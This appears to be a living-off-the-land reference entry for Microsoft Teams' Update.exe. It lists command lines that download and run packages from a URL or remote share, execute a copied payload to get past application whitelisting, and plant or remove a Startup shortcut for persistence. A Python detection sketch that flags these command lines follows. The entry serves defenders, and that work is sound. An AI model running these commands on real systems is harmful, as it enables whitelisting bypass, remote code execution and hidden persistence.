.. /Update.exe

Binary that updates an already installed NuGet/Squirrel package. Part of the Microsoft Teams installation.


Paths:

Resources:
Acknowledgements:

Detection:

Download

Update.exe contacts the given URL, looks for a RELEASES file there, and downloads the NuGet package.
Update.exe --download [url to package]
Usecase: Download binary
Privileges required: User
OS: Windows 7 and up with Microsoft Teams installed
MITRE ATT&CK®: T1218



AWL bypass

Update.exe contacts the given URL, looks for a RELEASES file there, then downloads and installs the NuGet package.
Update.exe --update=[url to package]
Usecase: Download and execute binary
Privileges required: User
OS: Windows 7 and up with Microsoft Teams installed
MITRE ATT&CK®: T1218



Update.exe looks for a RELEASES file at the given location, then downloads and installs the NuGet package via SAMBA.
Update.exe --update=\\remoteserver\payloadFolder
Usecase: Download and execute binary
Privileges required: User
OS: Windows 7 and up with Microsoft Teams installed
MITRE ATT&CK®: T1218



Update.exe contacts the given URL, looks for a RELEASES file there, then downloads and installs the NuGet package.
Update.exe --updateRollback=[url to package]
Usecase: Download and execute binary
Privileges required: User
OS: Windows 7 and up with Microsoft Teams installed
MITRE ATT&CK®: T1218



Copy your payload into %userprofile%\AppData\Local\Microsoft\Teams\current\. Then run the command. Update.exe will execute the file you copied.
Update.exe --processStart payload.exe --process-start-args "whatever args"
Usecase: Application Whitelisting Bypass
Privileges required: User
OS: Windows 7 and up with Microsoft Teams installed
MITRE ATT&CK®: T1218



Update.exe looks for a RELEASES file at the given location, then downloads and installs the NuGet package via SAMBA.
Update.exe --updateRollback=\\remoteserver\payloadFolder
Usecase: Download and execute binary
Privileges required: User
OS: Windows 7 and up with Microsoft Teams installed
MITRE ATT&CK®: T1218



Execute

Update.exe contacts the given URL, looks for a RELEASES file there, then downloads and installs the NuGet package.
Update.exe --update=[url to package]
Usecase: Download and execute binary
Privileges required: User
OS: Windows 7 and up with Microsoft Teams installed
MITRE ATT&CK®: T1218



Update.exe looks for a RELEASES file at the given location, then downloads and installs the NuGet package via SAMBA.
Update.exe --update=\\remoteserver\payloadFolder
Usecase: Download and execute binary
Privileges required: User
OS: Windows 7 and up with Microsoft Teams installed
MITRE ATT&CK®: T1218



Update.exe contacts the given URL, looks for a RELEASES file there, then downloads and installs the NuGet package.
Update.exe --updateRollback=[url to package]
Usecase: Download and execute binary
Privileges required: User
OS: Windows 7 and up with Microsoft Teams installed
MITRE ATT&CK®: T1218



Update.exe looks for a RELEASES file at the given location, then downloads and installs the NuGet package via SAMBA.
Update.exe --updateRollback=\\remoteserver\payloadFolder
Usecase: Download and execute binary
Privileges required: User
OS: Windows 7 and up with Microsoft Teams installed
MITRE ATT&CK®: T1218



Copy your payload into %userprofile%\AppData\Local\Microsoft\Teams\current\. Then run the command. Update.exe will execute the file you copied.
Update.exe --processStart payload.exe --process-start-args "whatever args"
Usecase: Execute binary
Privileges required: User
OS: Windows 7 and up with Microsoft Teams installed
MITRE ATT&CK®: T1218



Copy your payload into "%localappdata%\Microsoft\Teams\current\". Then run the command. Update.exe will create a payload.exe shortcut in "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup". The payload will then run at every login of the user who ran the command.
Update.exe --createShortcut=payload.exe -l=Startup
Usecase: Execute binary
Privileges required: User
OS: Windows 7 and up with Microsoft Teams installed
MITRE ATT&CK®: T1547



Run the command to remove the shortcut that the "--createShortcut" LolBinExecution described on this page created in the "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup" directory.
Update.exe --removeShortcut=payload.exe -l=Startup
Usecase: Execute binary
Privileges required: User
OS: Windows 7 and up with Microsoft Teams installed
MITRE ATT&CK®: T1070
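

Detection sketch for the command lines listed on this page, added here as an example (it is not part of the original entry or of the Squirrel/Teams code). It classifies process-creation command lines by the flags above; the function names, the EXPECTED_PROCESS_START allowlist and the sample events (including the updates.example.invalid URL) are assumptions constructed for illustration.

```python
import re

# Assumption: binaries Update.exe normally starts on this fleet; tune locally.
EXPECTED_PROCESS_START = {"teams.exe"}

IS_UPDATE_EXE = re.compile(r'(?:^|[\\/"\s])update\.exe"?(?:\s|$)', re.I)
FETCH = re.compile(r'--(download|updateRollback|update)[=\s]+"?([^"\s]+)', re.I)
PROC_START = re.compile(r'--processStart[=\s]+"?([^"\s]+)', re.I)
SHORTCUT = re.compile(r'--(createShortcut|removeShortcut)[=\s]+"?([^"\s]+)', re.I)
STARTUP = re.compile(r'\s-l[=\s]+"?[^"\s]*startup', re.I)
REMOTE = re.compile(r'(?:https?://|\\\\)', re.I)


def classify(cmdline):
    """Return (technique, flag, value) findings for one process command line."""
    if not IS_UPDATE_EXE.search(cmdline):
        return []
    findings = []
    m = FETCH.search(cmdline)
    if m and REMOTE.match(m.group(2)):  # package source is a URL or UNC share
        findings.append(("T1218", m.group(1).lower(), m.group(2)))
    m = PROC_START.search(cmdline)
    if m:
        exe = re.split(r'[\\/]', m.group(1))[-1].lower()
        if exe not in EXPECTED_PROCESS_START:  # unexpected child binary
            findings.append(("T1218", "processstart", exe))
    m = SHORTCUT.search(cmdline)
    if m and STARTUP.search(cmdline):  # Startup-folder shortcut added or removed
        technique = "T1547" if m.group(1).lower() == "createshortcut" else "T1070"
        findings.append((technique, m.group(1).lower(), m.group(2)))
    return findings


# Constructed sample process-creation command lines (not real telemetry).
SAMPLE_EVENTS = [
    r'"C:\Users\alice\AppData\Local\Microsoft\Teams\Update.exe" --processStart "Teams.exe"',
    r'Update.exe --update=https://updates.example.invalid/pkg',
    r'Update.exe --updateRollback=\\remoteserver\payloadFolder',
    r'Update.exe --processStart payload.exe --process-start-args "whatever args"',
    r'Update.exe --createShortcut=payload.exe -l=Startup',
    r'Update.exe --removeShortcut=payload.exe -l=Startup',
    r'C:\Windows\System32\notepad.exe update.exe.txt',
]


def scan(events):
    """Map each flagged command line to its findings; clean lines are omitted."""
    return {e: f for e in events if (f := classify(e))}
```

Feed classify() the command-line field of process-creation events (for example Sysmon Event ID 1 or Windows Security 4688 with command-line auditing enabled).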